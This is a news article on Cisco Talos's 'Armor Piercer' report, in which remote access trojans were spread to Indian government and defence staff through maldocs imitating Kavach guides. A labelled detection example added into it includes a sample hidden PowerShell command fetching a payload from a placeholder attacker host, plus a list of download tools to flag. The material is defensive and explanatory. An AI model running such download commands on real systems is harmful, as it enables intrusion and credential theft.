Malicious documents containing remote access trojans (RAT) were allegedly distributed to several Indian government and defence agency personnel to access confidential information, claimed Cisco Talos in a report.
The hacking operation termed “Armor Piercer” uses two RATs — Netwire RAT and WarzoneRAT (alias Ave Maria), and it was first observed in December 2020. The Cisco Talos report said that the RATs masqueraded as documents related to the Indian government’s Kavach Application.
What is Kavach? Kavach is a two-factor authentication application used by government employees to access their emails. There are multiple how-to-use Kavach documents available on the internet, issued by the Indian government. The malicious documents were modelled after these documents.
Operation Armor Piercer is a grim reminder of the vulnerabilities still existing in our cybersecurity posture. To ensure end-to-end security of India’s assets and information, government and defence agencies must implement a layered defence strategy that enables visibility and coverage across all endpoints. — Vishak Raman, Director, Security Business, Cisco India
MediaNama has reached out to the Indian Computer Emergency Response Team with queries pertaining to the alleged attack. The post will be updated when we receive a response.
Operation Armor Piercer is another instance of highly motivated threat actors using a set of RAT families to infect their victims. These RATs are packed with many out-of-the-box features to gain complete control over the infected systems. The use of RATs makes it challenging to track down the threat actors behind them.
What do these malware documents contain?
The maldocs pose as documents related to either meeting schedules pertinent to the victims, or as technical guides related to the Government of India’s IT infrastructure. It is likely that these files are either delivered as attachments or links in spear-phishing emails where the verbiage is meant to social engineer the victims into opening the maldoc attachments or downloading them from an attacker-controlled link — Cisco Talos report
These are some of the file names used:
- Online meeting schedule for OPS.doc
In other cases, Cisco Talos found that these maldocs were fashioned after security advisories, meeting schedules, and software installation files.
How does it work?
- Opening one of these documents activates an embedded payload.
- The payload downloads the malware from a remote location. “Throughout March and April 2021, the attackers utilized downloaders to download and execute the RAT payloads from remote locations,” the report said.
- The downloaded RAT then infects the system.
The Netwire and AveMaria RAT families are eventually downloaded and executed on the victim machine. In some cases, we’ve also discovered the deployment of custom .NET-based file enumerator modules that generate and exfiltrate file path listings of specific file extensions on the infected systems – Cisco Talos report
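The chain described above (maldoc opened, downloader stage fetches the RAT from a remote location) leaves a characteristic trace in endpoint telemetry: an Office application spawning a child process whose command line points at a remote URL. The following is an added detection example, not code from the MediaNama article or the Cisco Talos report. It runs a small rule over constructed Sysmon-style process-creation events. The child-process names in `DOWNLOADER_CHILDREN`, the host `attacker.example` and the payload name are assumptions; the report does not name the downloader binary this campaign used.

```python
"""
Added example (not from the MediaNama article or the Cisco Talos report):
a detection rule for the maldoc -> downloader -> remote payload chain,
run over constructed process-creation events.

Assumptions, not facts from the page:
- events are Sysmon-style process-creation records (parent image, image,
  command line), built inline here rather than read from a real log;
- the downloader stage runs as a child of the Office application that
  rendered the maldoc; the script/download helpers listed below are a
  generic set, not the tools the campaign is known to have used.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Applications that render Office documents; a child they spawn that reaches
# out to a remote location is the signal we look for.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}

# Generic script hosts and download helpers a downloader stage is commonly
# implemented with (assumption; the page does not say which one was used).
DOWNLOADER_CHILDREN = {"powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe",
                       "certutil.exe", "bitsadmin.exe", "rundll32.exe"}

URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: ProcessEvent) -> Optional[str]:
    """Return an alert label for a suspicious event, or None for benign ones."""
    parent = basename(ev.parent_image)
    child = basename(ev.image)
    if parent not in OFFICE_PARENTS:
        return None                      # only Office-spawned children matter here
    urls = URL_RE.findall(ev.command_line)
    if child in DOWNLOADER_CHILDREN and urls:
        return f"office-spawned downloader fetching {urls[0]}"
    if child in DOWNLOADER_CHILDREN:
        return f"office-spawned script host: {child}"
    if urls:
        return f"office child {child} with remote URL in command line"
    return None


def scan(events: List[ProcessEvent]) -> List[Tuple[str, str]]:
    """Run the rule over a batch of events; returns (image, alert label) pairs."""
    return [(ev.image, label) for ev in events if (label := classify(ev))]


# Constructed events. The document name mirrors one listed in the article;
# the host name and payload file name are placeholders.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r'"WINWORD.EXE" /n "Online meeting schedule for OPS.doc"'),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell.exe -w hidden -c "Invoke-WebRequest http://attacker.example/payload.bin"'),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\splwow64.exe",
                 "splwow64.exe 12288"),          # benign print helper, must not alert
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -c Get-Process"),  # not Office-spawned, must not alert
]

if __name__ == "__main__":
    for image, label in scan(SAMPLE_EVENTS):
        print(f"ALERT {label} ({image})")
```

Only the second event fires. The rule is deliberately narrow (parent must be an Office binary) so that ordinary PowerShell use on the host does not alert; in production it would be paired with the .NET file-enumerator behaviour the report mentions, such as a short-lived process reading many files of a few extensions and then making an outbound connection.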
What can the malware do?
This is what Netwire RAT (one of the two RATs identified by Cisco) can do —
- Steal credentials from browsers
- Execute arbitrary commands
- Gather system information
- Conduct file management operations such as writing, reading, copying and deleting files
- Enumerate and terminate processes
AveMaria RAT can do a whole lot more, such as —
- Enable the attacker to log in to the remote machine without anyone knowing
- Control computers remotely at 60 FPS using mouse and keyboard
- Give the attacker admin access with just one click
- Recover passwords from popular browsers and email clients in seconds. These include — Chrome, Firefox, Internet Explorer, Edge, Epic, UC, QQ, Opera, Blisk, SRWare, Dragon, Torch, Slimjet, Cent, Outlook, Thunderbird, and Foxmail.
- Enable automatic password recovery to receive passwords without touching any buttons
- Upload and download files at high speed
- Browse the Internet with the remote computer’s IP address
- If the remote computer has a webcam connected, the attacker can view the stream live. The attacker can also view the keys pressed on the remote computer in real time.
What is India’s cybersecurity strategy?
There has been a recent spurt in cyber attacks in India, including alleged attacks perpetrated by Chinese state actors. As of today, India still does not have a data protection law, and the National Cyber Security Strategy, which has been in the pipeline since 2019, has still not been finalised.